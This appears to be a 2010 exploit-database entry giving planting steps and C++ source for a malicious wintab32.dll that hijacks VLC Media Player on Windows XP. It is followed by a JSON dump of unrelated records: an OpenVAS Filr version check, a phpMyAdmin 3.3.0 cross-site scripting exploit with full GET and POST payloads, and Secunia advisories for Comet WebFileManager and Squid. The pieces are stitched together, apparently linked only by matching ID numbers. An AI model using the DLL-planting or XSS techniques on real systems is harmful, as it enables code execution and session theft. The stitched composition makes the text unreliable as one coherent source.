ID 1337DAY-ID-13825 Type zdt Reporter Secfence Modified 2010-08-25T00:00:00
Description
Exploit for windows platform in category local exploits
======================================
VLC Media Player DLL Hijacking Exploit
======================================
Exploit Title: VLC Player DLL Hijack Vulnerability
Date: 25 Aug 2010
Author: Secfence
Version: VLC (the affected version range is not stated by the author; only the build on the test system below is known to be affected)
Tested on: Windows XP
Place an .mp3 file and a malicious wintab32.dll in the same folder, then open the .mp3 file with VLC. VLC evidently loads wintab32.dll by name rather than by a fully qualified path, so the Windows DLL search order ends up resolving to the attacker-controlled copy sitting next to the media file (presumably the current directory when the file is opened from Explorer), and that DLL's DllMain runs inside VLC's process — a classic DLL-hijacking (binary-planting) condition. Tested on Windows XP only; whether newer Windows builds with a hardened DLL search order are affected is not established by this note.
Code for wintab32.dll (a Visual C++ DLL project — note that the narrow-string MessageBox call below only compiles in a non-UNICODE build):
/*----------*/
/* wintab32.cpp */
#include "stdafx.h"
#include "dragon.h"
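/* PoC payload: pops a message box so a successful hijack is visible.
 * It is invoked from DllMain on DLL_PROCESS_ATTACH, i.e. while the
 * loader lock is held. That is acceptable for a demo, but anything
 * beyond a message box should be deferred to a worker thread or an
 * exported function instead of being run from DllMain.
 * NOTE(review): the narrow string literals assume the project is built
 * without UNICODE (MessageBox -> MessageBoxA); use TEXT() otherwise. */
void init() {
    /* 0x3 is MB_YESNOCANCEL; named locally so the style flag is not a bare magic number. */
    const unsigned int box_style = 0x00000003u;
    MessageBox(NULL, "Pwned", "Pwned!", box_style);
}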
/* Standard DLL entry point. The only reason code acted on is
 * DLL_PROCESS_ATTACH, which fires the PoC payload init(); thread
 * attach/detach and process detach are ignored. It always reports
 * success so the loader keeps the module mapped in the host process. */
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    (void)hModule;      /* not needed by the payload */
    (void)lpReserved;   /* not needed by the payload */

    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        init();
    }

    return TRUE;
}
/*----------*/
{"openvas": [{"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "scanner", "description": "Filr is prone to multiple vulnerabilities", "modified": "2019-02-22T00:00:00", "published": "2016-07-25T00:00:00", "id": "OPENVAS:1361412562310105827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105827", "title": "Multiple Vulnerabilities in Micro Focus (Novell) Filr", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_filr_mult_vulns_07_16.nasl 3758 2016-07-25 17:09:24Z mime $\n#\n# Multiple vulnerabilities in Micro Focus (Novell) Filr\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microfocus:filr\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105827\");\n script_cve_id(\"CVE-2016-1607\", \"CVE-2016-1608\", \"CVE-2016-1609\", \"CVE-2016-1610\", \"CVE-2016-1611\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_version(\"$Revision: 13825 $\");\n\n script_name(\"Multiple Vulnerabilities in Micro Focus (Novell) Filr\");\n\n script_xref(name:\"URL\", value:\"https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities where detected in filr:\n\n - Cross Site Request Forgery (CSRF) - CVE-2016-1607\n\n - OS Command Injection - CVE-2016-1608\n\n - Insecure System Design\n\n - Persistent Cross-Site Scripting - CVE-2016-1609\n\n - Missing Cookie Flags\n\n - Authentication Bypass - CVE-2016-1610\n\n - Path Traversal - CVE-2016-1610\n\n - Insecure File Permissions - CVE-2016-1611\n\nSee the referenced advisory for further information.\");\n\n script_tag(name:\"solution\", value:\"Update to Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871 or newer\");\n\n script_tag(name:\"summary\", value:\"Filr is prone to multiple vulnerabilities\");\n\n script_tag(name:\"affected\", value:\"Filr 2 <= 2.0.0.421, Filr 1.2 <= 1.2.0.846\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 
07:38:47 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-25 16:47:46 +0200 (Mon, 25 Jul 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_filr_version.nasl\");\n script_mandatory_keys(\"filr/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\nif( version =~ \"^1\\.2\" )\n fix = '1.2.0.871';\n\nelse if( version =~ \"^2\\.0\" )\n fix = '2.0.0.465';\n\nelse\n exit( 99 );\n\nif( version_is_less( version:version, test_version:fix ) ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-10T11:04:49", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2010-03-13T00:00:00", "published": "2010-03-13T00:00:00", "id": "1337DAY-ID-11284", "href": "https://0day.today/exploit/description/11284", "type": "zdt", "title": "phpmyadmin 3.3.0 Cross Site Scripting Vulnerability", "sourceData": "===================================================\r\nphpmyadmin 3.3.0 Cross Site Scripting Vulnerability\r\n===================================================\r\n\r\nthere is a xss in phpmyadmin 3.3.0 when we create new database in interface, the \"new_db\" parameter do not filter characters when users enter. attacker can enter malicious code, like \"<script>alert(/liscker/);</script>\". it also can be true in post and get. but in post, we can not encode xss code, or , the xss will faild. 
\r\n \r\n \r\n \r\n \r\nFor example:\r\n \r\n \r\nGET:\r\n \r\nhttp://localhost/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=\r\n \r\n \r\nPOST:\r\n \r\nPOST /phpmyadmin/db_create.php HTTP/1.1\r\nAccept: */*\r\nReferer: http://localhost/phpmyadmin/db_create.php\r\nAccept-Language: zh-cn\r\nContent-Type: application/x-www-form-urlencoded\r\nUA-CPU: x86\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)\r\nHost: localhost\r\nContent-Length: 123\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: phpMyAdmin=95830e770d0f213c04d63b623940f46f95c6f571; pma_lang=en-utf-8; pma_charset=utf-8; pma_collation_connection=utf8_general_ci; pmaUser-1=Hfd255%2Bp2dc%3D; pma_navi_width=200; pmaPass-1=MlPzQC8J2iY%3D; pma_fontsize=82%25; pma_theme=original\r\ntoken=759f7a380111a292995ec447408bbdb3&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=\r\n \r\n \r\n \r\nWhen you test, please replace the session \"759f7a380111a292995ec447408bbdb3\" with yourself. 
I suggest to test it in interface.\r\n \r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11284"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nHardcore Disassembler / Reverse Engineer Wanted!\r\n\r\nWant to work with IDA and BinDiff?\r\nWant to write PoC's and Exploits?\r\n\r\nYour nationality is not important.\r\nWe will get you a work permit, find an apartment, and offer a\r\nrelocation compensation package.\r\n\r\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nComet WebFileManager "Language" File Inclusion Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA21432\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/21432/\r\n\r\nCRITICAL:\r\nHighly critical\r\n\r\nIMPACT:\r\nSystem access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nComet WebFileManger 0.x\r\nhttp://secunia.com/product/11284/\r\n\r\nDESCRIPTION:\r\nPhilipp Niedziela has discovered a vulnerability in Comet\r\nWebFileManager, which can be exploited by malicious people to\r\ncompromise a vulnerable system.\r\n\r\nInput passed to the "Language" parameter in CheckUpload.php is not\r\nproperly verified before being used to include files. This can be\r\nexploited to include arbitrary files from local or external\r\nresources.\r\n\r\nThe vulnerability has been confirmed in version 0.9.1. 
Other versions\r\nmay also be affected.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly verified.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nPhilipp Niedziela\r\n\r\nORIGINAL ADVISORY:\r\nhttp://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-08-09T00:00:00", "published": "2006-08-09T00:00:00", "id": "SECURITYVULNS:DOC:13825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13825", "title": "[SA21432] Comet WebFileManager "Language" File Inclusion Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:11", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nSquid Two Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA13825\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/13825/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nDoS, System access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nSquid 2.x\r\nhttp://secunia.com/product/310/\r\n\r\nDESCRIPTION:\r\nTwo vulnerabilities have been reported in Squid, which can be\r\nexploited by malicious people to cause a DoS (Denial of Service) or\r\npotentially compromise a vulnerable system.\r\n\r\n1) An error in the handling of invalid field values 
in\r\n"WCCP_I_SEE_YOU" messages can be exploited to crash Squid by sending\r\na specially crafted UDP datagram with a spoofed WCCP (Web Cache\r\nCommunication Protocol) router's IP address.\r\n\r\nSuccessful exploitation requires that WCCP is enabled (not default\r\nsetting).\r\n\r\n2) A boundary error in the "gopherToHTML()" function can be exploited\r\nvia a malicious gopher server to cause a buffer overflow by responding\r\nwith a specially crafted, overly long line.\r\n\r\nSuccessful exploitation may allow execution of arbitrary code.\r\n\r\nSOLUTION:\r\nApply patches for 2.5.STABLE7:\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/squid-2.5.STABLE7-gopher_html_parsing.patch\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/squid-2.5.STABLE7-wccp_denial_of_service.patch\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\n1)\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-wccp_denial_of_service\r\n2)\r\nhttp://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-gopher_html_parsing\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-01-14T00:00:00", "published": "2005-01-14T00:00:00", "id": "SECURITYVULNS:DOC:7597", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7597", "title": "[SA13825] Squid Two Vulnerabilities", "type": 
"securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}